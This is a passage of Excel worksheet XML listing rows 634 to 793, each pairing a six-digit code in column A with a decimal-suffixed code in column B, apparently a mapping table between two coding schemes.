    <row r="634" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A634" s="6">
        <v>400124</v>
      </c>
      <c r="B634" s="3">
        <v>901070.00300000003</v>
      </c>
    </row>
    <row r="635" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A635" s="6">
        <v>400124</v>
      </c>
      <c r="B635" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="636" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A636" s="6">
        <v>400124</v>
      </c>
      <c r="B636" s="3">
        <v>901056</v>
      </c>
    </row>
    <row r="637" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A637" s="6">
        <v>400124</v>
      </c>
      <c r="B637" s="3">
        <v>901056.00300000003</v>
      </c>
    </row>
    <row r="638" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A638" s="6">
        <v>400124</v>
      </c>
      <c r="B638" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="639" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A639" s="6">
        <v>400124</v>
      </c>
      <c r="B639" s="3">
        <v>901036.00300000003</v>
      </c>
    </row>
    <row r="640" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A640" s="6">
        <v>400124</v>
      </c>
      <c r="B640" s="3">
        <v>901556</v>
      </c>
    </row>
    <row r="641" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A641" s="6">
        <v>400124</v>
      </c>
      <c r="B641" s="3">
        <v>901556.00100000005</v>
      </c>
    </row>
    <row r="642" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A642" s="6">
        <v>400124</v>
      </c>
      <c r="B642" s="3">
        <v>901556.00300000003</v>
      </c>
    </row>
    <row r="643" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A643" s="6">
        <v>400124</v>
      </c>
      <c r="B643" s="3">
        <v>901556.00399999996</v>
      </c>
    </row>
    <row r="644" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A644" s="6">
        <v>400124</v>
      </c>
      <c r="B644" s="3">
        <v>901601</v>
      </c>
    </row>
    <row r="645" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A645" s="6">
        <v>400124</v>
      </c>
      <c r="B645" s="3">
        <v>901601.00100000005</v>
      </c>
    </row>
    <row r="646" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A646" s="6">
        <v>400124</v>
      </c>
      <c r="B646" s="3">
        <v>901601.00199999998</v>
      </c>
    </row>
    <row r="647" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A647" s="6">
        <v>400124</v>
      </c>
      <c r="B647" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="648" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A648" s="6">
        <v>400124</v>
      </c>
      <c r="B648" s="3">
        <v>901137.00100000005</v>
      </c>
    </row>
    <row r="649" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A649" s="6">
        <v>400124</v>
      </c>
      <c r="B649" s="3">
        <v>901137.00199999998</v>
      </c>
    </row>
    <row r="650" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A650" s="6">
        <v>400124</v>
      </c>
      <c r="B650" s="3">
        <v>901137.00600000005</v>
      </c>
    </row>
    <row r="651" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A651" s="6">
        <v>400124</v>
      </c>
      <c r="B651" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="652" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A652" s="6">
        <v>400124</v>
      </c>
      <c r="B652" s="3">
        <v>901055.00899999996</v>
      </c>
    </row>
    <row r="653" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A653" s="6">
        <v>400124</v>
      </c>
      <c r="B653" s="3">
        <v>901053</v>
      </c>
    </row>
    <row r="654" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A654" s="6">
        <v>400124</v>
      </c>
      <c r="B654" s="3">
        <v>901053.00199999998</v>
      </c>
    </row>
    <row r="655" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A655" s="6">
        <v>400124</v>
      </c>
      <c r="B655" s="3">
        <v>901053.00300000003</v>
      </c>
    </row>
    <row r="656" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A656" s="6">
        <v>400124</v>
      </c>
      <c r="B656" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="657" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A657" s="6">
        <v>400124</v>
      </c>
      <c r="B657" s="3">
        <v>901053.00600000005</v>
      </c>
    </row>
    <row r="658" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A658" s="6">
        <v>400124</v>
      </c>
      <c r="B658" s="3">
        <v>901505</v>
      </c>
    </row>
    <row r="659" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A659" s="6">
        <v>400124</v>
      </c>
      <c r="B659" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="660" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A660" s="6">
        <v>400124</v>
      </c>
      <c r="B660" s="3">
        <v>901505.00399999996</v>
      </c>
    </row>
    <row r="661" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A661" s="6">
        <v>400124</v>
      </c>
      <c r="B661" s="3">
        <v>901489</v>
      </c>
    </row>
    <row r="662" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A662" s="6">
        <v>400124</v>
      </c>
      <c r="B662" s="3">
        <v>901553</v>
      </c>
    </row>
    <row r="663" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A663" s="6">
        <v>400124</v>
      </c>
      <c r="B663" s="3">
        <v>901553.00100000005</v>
      </c>
    </row>
    <row r="664" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A664" s="6">
        <v>400124</v>
      </c>
      <c r="B664" s="3">
        <v>901553.00300000003</v>
      </c>
    </row>
    <row r="665" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A665" s="6">
        <v>400124</v>
      </c>
      <c r="B665" s="3">
        <v>901569</v>
      </c>
    </row>
    <row r="666" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A666" s="6">
        <v>400124</v>
      </c>
      <c r="B666" s="3">
        <v>901569.00100000005</v>
      </c>
    </row>
    <row r="667" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A667" s="6">
        <v>400124</v>
      </c>
      <c r="B667" s="3">
        <v>901080</v>
      </c>
    </row>
    <row r="668" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A668" s="6">
        <v>400124</v>
      </c>
      <c r="B668" s="3">
        <v>901600</v>
      </c>
    </row>
    <row r="669" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A669" s="6">
        <v>400124</v>
      </c>
      <c r="B669" s="3">
        <v>901600.00100000005</v>
      </c>
    </row>
    <row r="670" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A670" s="6">
        <v>400124</v>
      </c>
      <c r="B670" s="3">
        <v>901600.00199999998</v>
      </c>
    </row>
    <row r="671" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A671" s="6">
        <v>400130</v>
      </c>
      <c r="B671" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="672" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A672" s="6">
        <v>400130</v>
      </c>
      <c r="B672" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="673" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A673" s="6">
        <v>400130</v>
      </c>
      <c r="B673" s="3">
        <v>901562.00699999998</v>
      </c>
    </row>
    <row r="674" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A674" s="6">
        <v>400131</v>
      </c>
      <c r="B674" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="675" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A675" s="6">
        <v>400131</v>
      </c>
      <c r="B675" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="676" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A676" s="6">
        <v>400132</v>
      </c>
      <c r="B676" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="677" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A677" s="6">
        <v>400132</v>
      </c>
      <c r="B677" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="678" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A678" s="6">
        <v>400133</v>
      </c>
      <c r="B678" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="679" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A679" s="6">
        <v>400133</v>
      </c>
      <c r="B679" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="680" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A680" s="6">
        <v>400133</v>
      </c>
      <c r="B680" s="3">
        <v>901562.00699999998</v>
      </c>
    </row>
    <row r="681" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A681" s="6">
        <v>400140</v>
      </c>
      <c r="B681" s="3">
        <v>901495</v>
      </c>
    </row>
    <row r="682" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A682" s="6">
        <v>400140</v>
      </c>
      <c r="B682" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="683" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A683" s="6">
        <v>400140</v>
      </c>
      <c r="B683" s="3">
        <v>901564.005</v>
      </c>
    </row>
    <row r="684" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A684" s="6">
        <v>400140</v>
      </c>
      <c r="B684" s="3">
        <v>901542</v>
      </c>
    </row>
    <row r="685" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A685" s="6">
        <v>400140</v>
      </c>
      <c r="B685" s="3">
        <v>901542.00100000005</v>
      </c>
    </row>
    <row r="686" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A686" s="6">
        <v>400140</v>
      </c>
      <c r="B686" s="3">
        <v>901542.00199999998</v>
      </c>
    </row>
    <row r="687" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A687" s="6">
        <v>400140</v>
      </c>
      <c r="B687" s="3">
        <v>901542.00399999996</v>
      </c>
    </row>
    <row r="688" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A688" s="6">
        <v>400140</v>
      </c>
      <c r="B688" s="3">
        <v>901542.005</v>
      </c>
    </row>
    <row r="689" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A689" s="6">
        <v>400140</v>
      </c>
      <c r="B689" s="3">
        <v>901014</v>
      </c>
    </row>
    <row r="690" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A690" s="6">
        <v>400150</v>
      </c>
      <c r="B690" s="3">
        <v>901069</v>
      </c>
    </row>
    <row r="691" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A691" s="6">
        <v>400150</v>
      </c>
      <c r="B691" s="3">
        <v>901069.00300000003</v>
      </c>
    </row>
    <row r="692" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A692" s="6">
        <v>400151</v>
      </c>
      <c r="B692" s="3">
        <v>901069</v>
      </c>
    </row>
    <row r="693" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A693" s="6">
        <v>400151</v>
      </c>
      <c r="B693" s="3">
        <v>901069.00300000003</v>
      </c>
    </row>
    <row r="694" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A694" s="6">
        <v>400152</v>
      </c>
      <c r="B694" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="695" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A695" s="6">
        <v>400152</v>
      </c>
      <c r="B695" s="3">
        <v>901098.00199999998</v>
      </c>
    </row>
    <row r="696" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A696" s="6">
        <v>400160</v>
      </c>
      <c r="B696" s="3">
        <v>901612</v>
      </c>
    </row>
    <row r="697" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A697" s="6">
        <v>400160</v>
      </c>
      <c r="B697" s="3">
        <v>901525</v>
      </c>
    </row>
    <row r="698" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A698" s="6">
        <v>400160</v>
      </c>
      <c r="B698" s="3">
        <v>901204</v>
      </c>
    </row>
    <row r="699" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A699" s="6">
        <v>400160</v>
      </c>
      <c r="B699" s="3">
        <v>901204.00300000003</v>
      </c>
    </row>
    <row r="700" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A700" s="6">
        <v>400161</v>
      </c>
      <c r="B700" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="701" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A701" s="6">
        <v>400162</v>
      </c>
      <c r="B701" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="702" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A702" s="6">
        <v>400162</v>
      </c>
      <c r="B702" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="703" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A703" s="6">
        <v>400163</v>
      </c>
      <c r="B703" s="3">
        <v>901525</v>
      </c>
    </row>
    <row r="704" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A704" s="6">
        <v>400170</v>
      </c>
      <c r="B704" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="705" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A705" s="6">
        <v>400170</v>
      </c>
      <c r="B705" s="3">
        <v>901578.00199999998</v>
      </c>
    </row>
    <row r="706" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A706" s="6">
        <v>400170</v>
      </c>
      <c r="B706" s="3">
        <v>901535</v>
      </c>
    </row>
    <row r="707" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A707" s="6">
        <v>400170</v>
      </c>
      <c r="B707" s="3">
        <v>901204</v>
      </c>
    </row>
    <row r="708" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A708" s="6">
        <v>400170</v>
      </c>
      <c r="B708" s="3">
        <v>901204.00300000003</v>
      </c>
    </row>
    <row r="709" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A709" s="6">
        <v>400171</v>
      </c>
      <c r="B709" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="710" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A710" s="6">
        <v>400171</v>
      </c>
      <c r="B710" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="711" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A711" s="6">
        <v>400171</v>
      </c>
      <c r="B711" s="3">
        <v>901578.00300000003</v>
      </c>
    </row>
    <row r="712" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A712" s="6">
        <v>400172</v>
      </c>
      <c r="B712" s="3">
        <v>901580</v>
      </c>
    </row>
    <row r="713" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A713" s="6">
        <v>400173</v>
      </c>
      <c r="B713" s="3">
        <v>901580</v>
      </c>
    </row>
    <row r="714" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A714" s="6">
        <v>400173</v>
      </c>
      <c r="B714" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="715" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A715" s="6">
        <v>400173</v>
      </c>
      <c r="B715" s="3">
        <v>901614</v>
      </c>
    </row>
    <row r="716" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A716" s="6">
        <v>400174</v>
      </c>
      <c r="B716" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="717" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A717" s="6">
        <v>400174</v>
      </c>
      <c r="B717" s="3">
        <v>901578.00399999996</v>
      </c>
    </row>
    <row r="718" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A718" s="6">
        <v>400175</v>
      </c>
      <c r="B718" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="719" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A719" s="6">
        <v>400175</v>
      </c>
      <c r="B719" s="3">
        <v>901578.00399999996</v>
      </c>
    </row>
    <row r="720" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A720" s="6">
        <v>400175</v>
      </c>
      <c r="B720" s="3">
        <v>901204</v>
      </c>
    </row>
    <row r="721" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A721" s="6">
        <v>400175</v>
      </c>
      <c r="B721" s="3">
        <v>901204.00300000003</v>
      </c>
    </row>
    <row r="722" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A722" s="6">
        <v>400176</v>
      </c>
      <c r="B722" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="723" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A723" s="6">
        <v>400176</v>
      </c>
      <c r="B723" s="3">
        <v>901578.00399999996</v>
      </c>
    </row>
    <row r="724" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A724" s="6">
        <v>400180</v>
      </c>
      <c r="B724" s="3">
        <v>901583</v>
      </c>
    </row>
    <row r="725" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A725" s="6">
        <v>400180</v>
      </c>
      <c r="B725" s="3">
        <v>901583.00300000003</v>
      </c>
    </row>
    <row r="726" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A726" s="6">
        <v>400180</v>
      </c>
      <c r="B726" s="3">
        <v>901583.00399999996</v>
      </c>
    </row>
    <row r="727" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A727" s="6">
        <v>400180</v>
      </c>
      <c r="B727" s="3">
        <v>901583.00600000005</v>
      </c>
    </row>
    <row r="728" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A728" s="6">
        <v>400180</v>
      </c>
      <c r="B728" s="3">
        <v>901584</v>
      </c>
    </row>
    <row r="729" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A729" s="6">
        <v>400180</v>
      </c>
      <c r="B729" s="3">
        <v>901584.00300000003</v>
      </c>
    </row>
    <row r="730" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A730" s="6">
        <v>400180</v>
      </c>
      <c r="B730" s="3">
        <v>901584.00399999996</v>
      </c>
    </row>
    <row r="731" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A731" s="6">
        <v>400180</v>
      </c>
      <c r="B731" s="3">
        <v>901584.00600000005</v>
      </c>
    </row>
    <row r="732" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A732" s="6">
        <v>400180</v>
      </c>
      <c r="B732" s="3">
        <v>901587</v>
      </c>
    </row>
    <row r="733" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A733" s="6">
        <v>400180</v>
      </c>
      <c r="B733" s="3">
        <v>901587.00300000003</v>
      </c>
    </row>
    <row r="734" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A734" s="6">
        <v>400180</v>
      </c>
      <c r="B734" s="3">
        <v>901592</v>
      </c>
    </row>
    <row r="735" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A735" s="6">
        <v>400180</v>
      </c>
      <c r="B735" s="3">
        <v>901592.00100000005</v>
      </c>
    </row>
    <row r="736" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A736" s="6">
        <v>400180</v>
      </c>
      <c r="B736" s="3">
        <v>901592.00199999998</v>
      </c>
    </row>
    <row r="737" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A737" s="6">
        <v>400180</v>
      </c>
      <c r="B737" s="3">
        <v>901592.00399999996</v>
      </c>
    </row>
    <row r="738" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A738" s="6">
        <v>400180</v>
      </c>
      <c r="B738" s="3">
        <v>901588</v>
      </c>
    </row>
    <row r="739" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A739" s="6">
        <v>400180</v>
      </c>
      <c r="B739" s="3">
        <v>901588.00399999996</v>
      </c>
    </row>
    <row r="740" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A740" s="6">
        <v>400180</v>
      </c>
      <c r="B740" s="3">
        <v>901608</v>
      </c>
    </row>
    <row r="741" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A741" s="6">
        <v>400180</v>
      </c>
      <c r="B741" s="3">
        <v>901608.00100000005</v>
      </c>
    </row>
    <row r="742" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A742" s="6">
        <v>400180</v>
      </c>
      <c r="B742" s="3">
        <v>901608.00199999998</v>
      </c>
    </row>
    <row r="743" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A743" s="6">
        <v>400180</v>
      </c>
      <c r="B743" s="3">
        <v>901608.00300000003</v>
      </c>
    </row>
    <row r="744" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A744" s="6">
        <v>400180</v>
      </c>
      <c r="B744" s="3">
        <v>901608.00399999996</v>
      </c>
    </row>
    <row r="745" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A745" s="6">
        <v>400180</v>
      </c>
      <c r="B745" s="3">
        <v>901608.005</v>
      </c>
    </row>
    <row r="746" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A746" s="6">
        <v>400181</v>
      </c>
      <c r="B746" s="3">
        <v>901583</v>
      </c>
    </row>
    <row r="747" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A747" s="6">
        <v>400181</v>
      </c>
      <c r="B747" s="3">
        <v>901583.00300000003</v>
      </c>
    </row>
    <row r="748" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A748" s="6">
        <v>400181</v>
      </c>
      <c r="B748" s="3">
        <v>901583.00399999996</v>
      </c>
    </row>
    <row r="749" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A749" s="6">
        <v>400181</v>
      </c>
      <c r="B749" s="3">
        <v>901584</v>
      </c>
    </row>
    <row r="750" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A750" s="6">
        <v>400181</v>
      </c>
      <c r="B750" s="3">
        <v>901584.00300000003</v>
      </c>
    </row>
    <row r="751" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A751" s="6">
        <v>400181</v>
      </c>
      <c r="B751" s="3">
        <v>901584.00399999996</v>
      </c>
    </row>
    <row r="752" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A752" s="6">
        <v>400190</v>
      </c>
      <c r="B752" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="753" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A753" s="6">
        <v>400190</v>
      </c>
      <c r="B753" s="3">
        <v>901547.00600000005</v>
      </c>
    </row>
    <row r="754" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A754" s="6">
        <v>400200</v>
      </c>
      <c r="B754" s="3">
        <v>901185</v>
      </c>
    </row>
    <row r="755" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A755" s="6">
        <v>400200</v>
      </c>
      <c r="B755" s="3">
        <v>901538</v>
      </c>
    </row>
    <row r="756" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A756" s="6">
        <v>400200</v>
      </c>
      <c r="B756" s="3">
        <v>901213</v>
      </c>
    </row>
    <row r="757" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A757" s="6">
        <v>400200</v>
      </c>
      <c r="B757" s="3">
        <v>901213.00100000005</v>
      </c>
    </row>
    <row r="758" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A758" s="6">
        <v>400200</v>
      </c>
      <c r="B758" s="3">
        <v>901213.00199999998</v>
      </c>
    </row>
    <row r="759" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A759" s="6">
        <v>400200</v>
      </c>
      <c r="B759" s="3">
        <v>901213.00300000003</v>
      </c>
    </row>
    <row r="760" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A760" s="6">
        <v>400200</v>
      </c>
      <c r="B760" s="3">
        <v>901114</v>
      </c>
    </row>
    <row r="761" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A761" s="6">
        <v>400200</v>
      </c>
      <c r="B761" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="762" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A762" s="6">
        <v>400200</v>
      </c>
      <c r="B762" s="3">
        <v>901606</v>
      </c>
    </row>
    <row r="763" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A763" s="6">
        <v>400200</v>
      </c>
      <c r="B763" s="3">
        <v>901606.00100000005</v>
      </c>
    </row>
    <row r="764" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A764" s="6">
        <v>400200</v>
      </c>
      <c r="B764" s="3">
        <v>901606.00199999998</v>
      </c>
    </row>
    <row r="765" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A765" s="6">
        <v>400200</v>
      </c>
      <c r="B765" s="3">
        <v>901556</v>
      </c>
    </row>
    <row r="766" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A766" s="6">
        <v>400200</v>
      </c>
      <c r="B766" s="3">
        <v>901556.00100000005</v>
      </c>
    </row>
    <row r="767" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A767" s="6">
        <v>400200</v>
      </c>
      <c r="B767" s="3">
        <v>901556.00300000003</v>
      </c>
    </row>
    <row r="768" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A768" s="6">
        <v>400200</v>
      </c>
      <c r="B768" s="3">
        <v>901563</v>
      </c>
    </row>
    <row r="769" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A769" s="6">
        <v>400200</v>
      </c>
      <c r="B769" s="3">
        <v>901563.00100000005</v>
      </c>
    </row>
    <row r="770" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A770" s="6">
        <v>400200</v>
      </c>
      <c r="B770" s="3">
        <v>901563.00199999998</v>
      </c>
    </row>
    <row r="771" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A771" s="6">
        <v>400200</v>
      </c>
      <c r="B771" s="3">
        <v>901021</v>
      </c>
    </row>
    <row r="772" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A772" s="6">
        <v>400200</v>
      </c>
      <c r="B772" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="773" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A773" s="6">
        <v>400200</v>
      </c>
      <c r="B773" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="774" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A774" s="6">
        <v>400200</v>
      </c>
      <c r="B774" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="775" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A775" s="6">
        <v>400200</v>
      </c>
      <c r="B775" s="3">
        <v>901021.005</v>
      </c>
    </row>
    <row r="776" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A776" s="6">
        <v>400200</v>
      </c>
      <c r="B776" s="3">
        <v>901021.00600000005</v>
      </c>
    </row>
    <row r="777" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A777" s="6">
        <v>400200</v>
      </c>
      <c r="B777" s="3">
        <v>901199</v>
      </c>
    </row>
    <row r="778" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A778" s="6">
        <v>400200</v>
      </c>
      <c r="B778" s="3">
        <v>901550</v>
      </c>
    </row>
    <row r="779" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A779" s="6">
        <v>400200</v>
      </c>
      <c r="B779" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="780" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A780" s="6">
        <v>400200</v>
      </c>
      <c r="B780" s="3">
        <v>901550.00300000003</v>
      </c>
    </row>
    <row r="781" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A781" s="6">
        <v>400200</v>
      </c>
      <c r="B781" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="782" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A782" s="6">
        <v>400200</v>
      </c>
      <c r="B782" s="3">
        <v>901078.00100000005</v>
      </c>
    </row>
    <row r="783" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A783" s="6">
        <v>400200</v>
      </c>
      <c r="B783" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="784" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A784" s="6">
        <v>400200</v>
      </c>
      <c r="B784" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="785" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A785" s="6">
        <v>400200</v>
      </c>
      <c r="B785" s="3">
        <v>901078.00399999996</v>
      </c>
    </row>
    <row r="786" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A786" s="6">
        <v>400201</v>
      </c>
      <c r="B786" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="787" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A787" s="6">
        <v>400201</v>
      </c>
      <c r="B787" s="3">
        <v>901558</v>
      </c>
    </row>
    <row r="788" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A788" s="6">
        <v>400201</v>
      </c>
      <c r="B788" s="3">
        <v>901558.00100000005</v>
      </c>
    </row>
    <row r="789" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A789" s="6">
        <v>400201</v>
      </c>
      <c r="B789" s="3">
        <v>901558.00199999998</v>
      </c>
    </row>
    <row r="790" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A790" s="6">
        <v>400201</v>
      </c>
      <c r="B790" s="3">
        <v>901199</v>
      </c>
    </row>
    <row r="791" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A791" s="6">
        <v>400201</v>
      </c>
      <c r="B791" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="792" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A792" s="6">
        <v>400201</v>
      </c>
      <c r="B792" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="793" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A793" s="6">
        <v>400201</v>
      </c>
      <c r="B793" s="3">
        <v>901078.00300000003</v>
